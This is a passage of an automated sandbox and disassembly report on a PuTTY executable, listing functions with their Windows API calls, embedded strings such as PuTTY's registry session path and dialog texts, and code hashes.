                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: Menu$Append$Window$Create$_strlen$Message$FileForeground$DialogLoadRectRegisterShowView_strcat$ActiveAddressBitmapCallbackCaretClassClickClientClipboardCloseCursorDispatchDispatcherDoubleFormatHandleIconInfoInitializeKeyboardLayoutModuleMultipleNameObjectsParamPeekPopupProcScrollSystemTimeUnmapUpdateUserVersionWait_strncpy_strrchr_strspn
                            • String ID: QG$%p:%u$%s Fatal Error$%s Uninstallation$%s Warning$&About %s$&Duplicate Session$&Event Log$&Full Screen$&Help$&Paste$-cleanup$-cleanup-during-uninstall$-pgpfp$..\windows\window.c$C&lear Scrollback$C&opy All to Clipboard$Chan&ge Settings...$Failed to initialize COM subsystem$FlashWindowEx$MSWHEEL_ROLLMSG$Ne&w Session...$PuTTY$Remove saved sessions and random seed file?If you hit Yes, ALL Registry entries associatedwith %s will be removed, as well as therandom seed file. THIS PROCESS WILLDESTROY YOUR SAVED SESSIONS.(This only affects the currently logged-in user.)If you hit $Rese&t Terminal$Sa&ved Sessions$This procedure will remove ALL Registry entriesassociated with %s, and will also removethe random seed file. (This only affects thecurrently logged-in user.)THIS PROCESS WILL DESTROY YOUR SAVED SESSIONS.Are you really sure you want to continue?$Windows refuses to report a version$option "%s" requires an argument$ret == 2$telnet:$unknown option "%s"$user32.dll$tE
                            • API String ID: 121397198-1735199403
                            • Opcode ID: adb9dfa74cc03708bf7dfd2251689837a051042d0549525623af1c15962badec
                            • Instruction ID: 5ba530037648658747e054a57dc0525cb4e48bdcb3ed0a685d322f78efb5b505
                            • Opcode Fuzzy Hash: adb9dfa74cc03708bf7dfd2251689837a051042d0549525623af1c15962badec
                            • Instruction Fuzzy Hash: 3E62E371504344BFFB21AF21EC46B6A3FA9FB45319F20403BF944962A2DB799881CB5D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Rendered graph omitted (legend: Executed / Not Executed); basic-block listing begins at 43c92a-43c93c
                            APIs
                            • GetWindowLongA.USER32(?,000000EB), ref: 0043C976
                              • Part of subcall function 0043BA8E: RegisterClipboardFormatA.USER32(commctrl_DragListMsg), ref: 0043BAA7
                            • GetCapture.USER32 ref: 0043C9A1
                            • ReleaseCapture.USER32 ref: 0043C9CD
                            • SetWindowTextA.USER32(?), ref: 0043CA17
                            • SetWindowLongA.USER32(?,000000EB,00000000), ref: 0043CA29
                            • GetWindowLongA.USER32(?,000000EC), ref: 0043CA37
                            • SetWindowLongA.USER32(?,000000EC,00000000), ref: 0043CA46
                            • GetDlgItem.USER32(?,000003ED), ref: 0043CA50
                            • DestroyWindow.USER32(00000000), ref: 0043CA5B
                            • LoadIconA.USER32(000000C9), ref: 0043CA6C
                            • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0043CA81
                            • GetDesktopWindow.USER32 ref: 0043CA83
                            • GetWindowRect.USER32(00000000,?), ref: 0043CA94
                            • GetWindowRect.USER32(?,?), ref: 0043CAA1
                            • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0043CADE
                            • MapDialogRect.USER32(?,?), ref: 0043CB02
                            • CreateWindowExA.USER32(00000000,STATIC,Cate&gory:,50000000,?,?,?,?,00000062,000003EF,00000000), ref: 0043CB3B
                            • SendMessageA.USER32(00000062,00000031,00000000,00000000), ref: 0043CB4B
                            • SendMessageA.USER32(?,00000030,00000000,00000001), ref: 0043CB55
                            • MapDialogRect.USER32(00000062,?), ref: 0043CB76
                            • CreateWindowExA.USER32(00000200,SysTreeView32,00457667,50010037,?,b,?,b,00000062,000003F0,00000000), ref: 0043CBB3
                            • SendMessageA.USER32(00000062,00000031,00000000,00000000), ref: 0043CBC2
                            • SendMessageA.USER32(00000000,00000030,00000000,00000001), ref: 0043CBCA
                            • _strrchr.LIBCMT ref: 0043CC5A
                            • SendMessageA.USER32(00000000,0000110B,00000009,?), ref: 0043CCAC
                            • GetDlgItem.USER32(FFFFFE6E,?), ref: 0043CDA5
                            • DestroyWindow.USER32(00000000), ref: 0043CDB0
                            • SetWindowLongA.USER32(00000062,000000EB,00000001), ref: 0043CCE1
                              • Part of subcall function 0043C7D5: SetWindowLongA.USER32(?,00000022,?), ref: 0043C7E6
                              • Part of subcall function 0043C7D5: SetWindowLongA.USER32(00000001,0000001E,00000001), ref: 0043C7F0
                            • MessageBeep.USER32(00000000), ref: 0043CD0B
                            • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 0043CD44
                            • SendMessageA.USER32(FFFFFE6E,0000000B,00000000,00000000), ref: 0043CD50
                            • SendMessageA.USER32(?,0000110C,00000000,?), ref: 0043CD7B
                            • SendMessageA.USER32(FFFFFE6E,0000000B,00000001,00000000), ref: 0043CE20
                            • InvalidateRect.USER32(FFFFFE6E,00000000,00000001), ref: 0043CE28
                            • SetFocus.USER32(?), ref: 0043CE33
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: Window$Message$Send$Long$Rect$CaptureCreateDestroyDialogItem$BeepClipboardDesktopFocusFormatIconInvalidateLoadMoveRegisterReleaseText_strrchr
                            • String ID: b$b$..\windows\windlg.c$@$@KG$@KG$Cate&gory:$STATIC$SysTreeView32$b$gvE$j == ctrl_path_elements(s->pathname) - 1
                            • API String ID: 763474852-138607456
                            • Opcode ID: 820ded45f15959f7dfa44e4dd375cef2a82d75433f1b31406ec618b974cdb8b1
                            • Instruction ID: 6546697fb9cfe94d6f70a5b1d0082ce098c52ff46f55735f238f881ff9a157d6
                            • Opcode Fuzzy Hash: 820ded45f15959f7dfa44e4dd375cef2a82d75433f1b31406ec618b974cdb8b1
                            • Instruction Fuzzy Hash: 60F19A72900209AFDF11DFA4DC85EAE7BB9FF08315F10502AF904B62A1C775AE90DB59
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Rendered graph omitted (legend: Executed / Not Executed); basic-block listing begins at 43c6eb-43c76c
                            APIs
                            • LoadCursorA.USER32(00000000,00007F00), ref: 0043C71D
                            • RegisterClassA.USER32(00002808), ref: 0043C73B
                            • CreateDialogParamA.USER32(?,?,?,?,00000000), ref: 0043C74C
                            • SetWindowLongA.USER32(00000000,0000001E,00000000), ref: 0043C75E
                            • SetWindowLongA.USER32(00000000,00000022,00000000), ref: 0043C764
                            • GetWindowLongA.USER32(00000000,0000001E), ref: 0043C771
                            • IsDialogMessageA.USER32(00000000,?,?,?,?,?,00000000), ref: 0043C785
                            • DispatchMessageA.USER32(?), ref: 0043C793
                            • KiUserCallbackDispatcher.NTDLL(?,00000000,00000000,00000000), ref: 0043C7A5
                            • PostQuitMessage.USER32(?), ref: 0043C7B6
                            • GetWindowLongA.USER32(00000000,00000022), ref: 0043C7BF
                            • DestroyWindow.USER32(00000000,?,?,?,?,00000000), ref: 0043C7C8
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: Window$Long$Message$Dialog$CallbackClassCreateCursorDestroyDispatchDispatcherLoadParamPostQuitRegisterUser
                            • String ID: &
                            • API String ID: 2918427034-1010288
                            • Opcode ID: e4d4b93dcd1250c409b3c6526e17ced969770ada7862e5a76529edbb13cada17
                            • Instruction ID: 3f3c69005660f4a2abe60eedff5340df5d298dce835a1d90e2f137e8f8bc3de0
                            • Opcode Fuzzy Hash: e4d4b93dcd1250c409b3c6526e17ced969770ada7862e5a76529edbb13cada17
                            • Instruction Fuzzy Hash: B33118B1904318ABDB109FA5ED889DEBFBCEF08762F105026F905E2252D7749940DFA4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Rendered graph omitted (legend: Executed / Not Executed); basic-block listing begins at 43a59a-43a5b6
                            APIs
                              • Part of subcall function 0043A32E: _strlen.LIBCMT ref: 0043A33E
                            • SendDlgItemMessageA.USER32(00000001,00000002,00000192,?,?), ref: 0043AC67
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: ItemMessageSend_strlen
                            • String ID: !"Can't happen"$!ctrl->generic.tabdelay$(ctrl->columns.ncols == 1) ^ (ncols == 1)$..\windows\winctrls.c$d$i < ntabdelays$ncols <= lenof(columns)$nshortcuts < MAX_SHORTCUTS_PER_CTRL$ntabdelays < lenof(tabdelays)$u
                            • API String ID: 599799640-2119785801
                            • Opcode ID: cf94a692f30318953ec5ca5bc6d92a6bfcbfa8ee4e960a172c51a99662847605
                            • Instruction ID: 68557a700a779c4e139e4a2efa4221357b1149a47b4f1e86fa866a7b332f015e
                            • Opcode Fuzzy Hash: cf94a692f30318953ec5ca5bc6d92a6bfcbfa8ee4e960a172c51a99662847605
                            • Instruction Fuzzy Hash: F542A071940209DFCF14DF55C881AEEBBB5FF4C304F24506AE845AB242D778AD51CB9A
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Rendered graph omitted (legend: Executed / Not Executed); basic-block listing begins at 44974c-449757
                            APIs
                            • _strlen.LIBCMT ref: 00449766
                            • RegOpenKeyA.ADVAPI32(80000001,Software\SimonTatham\PuTTY\Sessions,?), ref: 00449797
                            • RegOpenKeyA.ADVAPI32(?,00000000,?), ref: 004497AB
                            • RegCloseKey.ADVAPI32(?,?,-load,?,00410E80,?,?,00401130,?,?), ref: 004497B8
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: Open$Close_strlen
                            • String ID: -load$Default Settings$Software\SimonTatham\PuTTY\Sessions
                            • API String ID: 3264041530-171475511
                            • Opcode ID: 3a430bd73f6866366c2838ff0bfdc6dd6aee4be4951cf86d17448beb6fcdc48b
                            • Instruction ID: 32ebc23046e39b9210a98a3181ac8289d3da65599d3d2aaa667d1261dfd274ad
                            • Opcode Fuzzy Hash: 3a430bd73f6866366c2838ff0bfdc6dd6aee4be4951cf86d17448beb6fcdc48b
                            • Instruction Fuzzy Hash: F501D232904118FBEB119E51DC05FAB3BA8DF40764F24002BF804A6191DB79DE4197AC
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • CreateFileA.KERNELBASE(0043D0FD,80000000,0043D0FD,0000000C,00000001,00000080,00000000,00000001,00000000,00000000), ref: 00454502
                            • GetFileType.KERNEL32(00000000), ref: 0045450F
                            • CloseHandle.KERNEL32(00000000), ref: 0045451A
                            • GetLastError.KERNEL32 ref: 00454520
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: File$CloseCreateErrorHandleLastType
                            • String ID: H
                            • API String ID: 1809617866-2852464175
                            • Opcode ID: f6fbdc22a15bc53fe651ca245ef2a47340ef33d25cbf79b7f9888e42b25adec5
                            • Instruction ID: dcaf63e6907ea8ad0c05b088ec068c673a000e1b5cf58ee3ac1fd38cf579951f
                            • Opcode Fuzzy Hash: f6fbdc22a15bc53fe651ca245ef2a47340ef33d25cbf79b7f9888e42b25adec5
                            • Instruction Fuzzy Hash: EE812870948249A7EF208F94C8447AE7B60AB8231EF14416BED55AF2D3E37D49CDC74A
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • MapDialogRect.USER32(?,?), ref: 0043918A
                            • CreateWindowExA.USER32(?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 004391BA
                            • SendMessageA.USER32(00000000,00000030,?,00000001), ref: 004391CA
                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000116), ref: 004391F2
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: Window$CreateDialogMessageRectSend
                            • String ID: LISTBOX
                            • API String ID: 4261271132-1812161947
                            • Opcode ID: ac71a082251d14c553236cfbe2663334f61479f406ee6b00492b2e489fba775a
                            • Instruction ID: f51a0f5dc01ea03eb82e640ee32b55d0696c559b639a2e676fad2eb7104b5740
                            • Opcode Fuzzy Hash: ac71a082251d14c553236cfbe2663334f61479f406ee6b00492b2e489fba775a
                            • Instruction Fuzzy Hash: 42112732100209BFEF125F94EC05EEA3BBAEF49761F004025FE05A1161D676E821EB65
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: _strlen$_strcat
                            • String ID:
                            • API String ID: 1497175149-0
                            • Opcode ID: eacbb008b8f62cbea0c162e66a38db9337e9aca4d20afcadbcda4783ecc9b35f
                            • Instruction ID: f207afea09e08fedd646cc0d30e97ecacfcb7db66eadf47c3c69a9b09e99e2e1
                            • Opcode Fuzzy Hash: eacbb008b8f62cbea0c162e66a38db9337e9aca4d20afcadbcda4783ecc9b35f
                            • Instruction Fuzzy Hash: FDF09677E0121537E71065A96C81B5F6389EF50318B19043AFD08E7302F6BED91041DD
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 00449A85: RegOpenKeyA.ADVAPI32(80000001,Software\SimonTatham\PuTTY\Sessions,?), ref: 00449A97
                              • Part of subcall function 00449ABF: RegEnumKeyA.ADVAPI32(00000800,?,00000000,00000000), ref: 00449AE7
                            • _strlen.LIBCMT ref: 00410D30
                            • _strcat.LIBCMT ref: 00410D61
                            • _strlen.LIBCMT ref: 00410D6C
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: _strlen$EnumOpen_strcat
                            • String ID: Default Settings
                            • API String ID: 2951032735-575833508
                            • Opcode ID: 6a1ba931c442906fe4b2445d57938f6e461b9110586a87c4de48caf960398cfa
                            • Instruction ID: e3a4a535723c965107ae9caddd67621e34fae7e09d36579ca7fa3ea744b86ee4
                            • Opcode Fuzzy Hash: 6a1ba931c442906fe4b2445d57938f6e461b9110586a87c4de48caf960398cfa
                            • Instruction Fuzzy Hash: B2411671504305AFE7219F52EC41BA777E9FF40318F24842FF89996252EBB8E9C58B48
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • CreateDialogParamA.USER32(0000006F,00000000,Function_0003C7F4,00000000), ref: 0043CEC0
                            • ShowWindow.USER32(00000000,00000000), ref: 0043CECB
                            • SetActiveWindow.USER32(00000000), ref: 0043CED2
                            • KiUserCallbackDispatcher.NTDLL(00000000), ref: 0043CED9
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: Window$ActiveCallbackCreateDialogDispatcherParamShowUser
                            • String ID:
                            • API String ID: 916146323-0
                            • Opcode ID: e6a29d7ba973360bd726891a79e5394b50c5aab0ea5bdef25fa18f616b96e136
                            • Instruction ID: d0b957b0578173de60fb9d8d2a35369a6c172a835c08933b532ecbf9426d740a
                            • Opcode Fuzzy Hash: e6a29d7ba973360bd726891a79e5394b50c5aab0ea5bdef25fa18f616b96e136
                            • Instruction Fuzzy Hash: 4AD0C73114D721BBE2211720BC4DFD93E18EF06757F100071FA01751F287555542CBAD
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 0044C558: _strcat.LIBCMT ref: 0044C598
                              • Part of subcall function 0044C558: GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,?,00000002), ref: 0044C5D6
                              • Part of subcall function 0044C558: _strcat.LIBCMT ref: 0044C5EC
                              • Part of subcall function 0044C558: _strlen.LIBCMT ref: 0044C5FC
                              • Part of subcall function 0044C558: _strlen.LIBCMT ref: 0044C60D
                              • Part of subcall function 0044C558: _strncpy.LIBCMT ref: 0044C628
                              • Part of subcall function 0044C558: _strlen.LIBCMT ref: 0044C665
                              • Part of subcall function 0044C558: _strlen.LIBCMT ref: 0044C67A
                              • Part of subcall function 0043A32E: _strlen.LIBCMT ref: 0043A33E
                            • SetDlgItemTextA.USER32(?,?,00000000), ref: 0043B4A1
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: _strlen$_strcat$FileItemModuleNameText_strncpy
                            • String ID: !"Can't happen"$..\windows\winctrls.c
                            • API String ID: 4089977181-3161324462
                            • Opcode ID: dabaeee97bf71a850903d42d0ac4f3543e1a15f9c63e607a90a4a33ed65c2ec4
                            • Instruction ID: 66f516245bc3f37b305ae5251d6c6ffeeab41b87630427fc8edf76734828f293
                            • Opcode Fuzzy Hash: dabaeee97bf71a850903d42d0ac4f3543e1a15f9c63e607a90a4a33ed65c2ec4
                            • Instruction Fuzzy Hash: 8F11552A216141AB8A145B159882F273758EF6D325F18902BFB5887383DF38EC0086DE
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • SendDlgItemMessageA.USER32(?,?,00000143,00000000,?), ref: 0043B1B8
                            Strings
                            • ..\windows\winctrls.c, xrefs: 0043B181
                            • c && (c->ctrl->generic.type == CTRL_LISTBOX || (c->ctrl->generic.type == CTRL_EDITBOX && c->ctrl->editbox.has_list)), xrefs: 0043B186
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: ItemMessageSend
                            • String ID: ..\windows\winctrls.c$c && (c->ctrl->generic.type == CTRL_LISTBOX || (c->ctrl->generic.type == CTRL_EDITBOX && c->ctrl->editbox.has_list))
                            • API String ID: 3015471070-3468507388
                            • Opcode ID: b3584394dd797a8044ddcb963ba6de7b65c04569b590fd502cc17f2b99742021
                            • Instruction ID: 367ae41d43e6b46f238b4de05c35f38f3f11e6bf901f54133b0cb958510b028b
                            • Opcode Fuzzy Hash: b3584394dd797a8044ddcb963ba6de7b65c04569b590fd502cc17f2b99742021
                            • Instruction Fuzzy Hash: CCF0AF31200200EFEF208A08EC61F2637A5EF8D361F11102AF24497264C739AD50CB9A
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • SetDlgItemTextA.USER32(?,?,?), ref: 0043B097
                            Strings
                            • ..\windows\winctrls.c, xrefs: 0043B07A
                            • c && c->ctrl->generic.type == CTRL_EDITBOX, xrefs: 0043B07F
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: ItemText
                            • String ID: ..\windows\winctrls.c$c && c->ctrl->generic.type == CTRL_EDITBOX
                            • API String ID: 3367045223-1421371545
                            • Opcode ID: 045661dc7d2bca4fd63635037739c3ee32d4be041cd9da41a4878a8d3a8272d8
                            • Instruction ID: ed3d365973bb1f30652e9ac7b9db296450869d6ae95ebda871ee53c2bbf07035
                            • Opcode Fuzzy Hash: 045661dc7d2bca4fd63635037739c3ee32d4be041cd9da41a4878a8d3a8272d8
                            • Instruction Fuzzy Hash: C6E09235240601FFD7156B09EC05D177BB5EFC5711B15442AF594A3225DB359C20CBA6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • _strlen.LIBCMT ref: 0043C82B
                            • SendMessageA.USER32(?,00001100,00000000,FFFF0000), ref: 0043C84E
                            • SendMessageA.USER32(?,00001102,00000001), ref: 0043C86B
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: MessageSend$_strlen
                            • String ID:
                            • API String ID: 3697954797-0
                            • Opcode ID: fc63fa3c66d52847dfbc6a1d601b4c12d9fbe1c9888f89301be1e32539c926e5
                            • Instruction ID: 4d56353ba58f8e0150e24cdadb7815a3810973388709472ff102041561a09742
                            • Opcode Fuzzy Hash: fc63fa3c66d52847dfbc6a1d601b4c12d9fbe1c9888f89301be1e32539c926e5
                            • Instruction Fuzzy Hash: 31119076900205AFDB14DF6DDC80AABBBFAEB88341F10842EE605E7354D770E9018B44
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • SendMessageA.USER32(?,00000401,00000003,00000000), ref: 004398B7
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
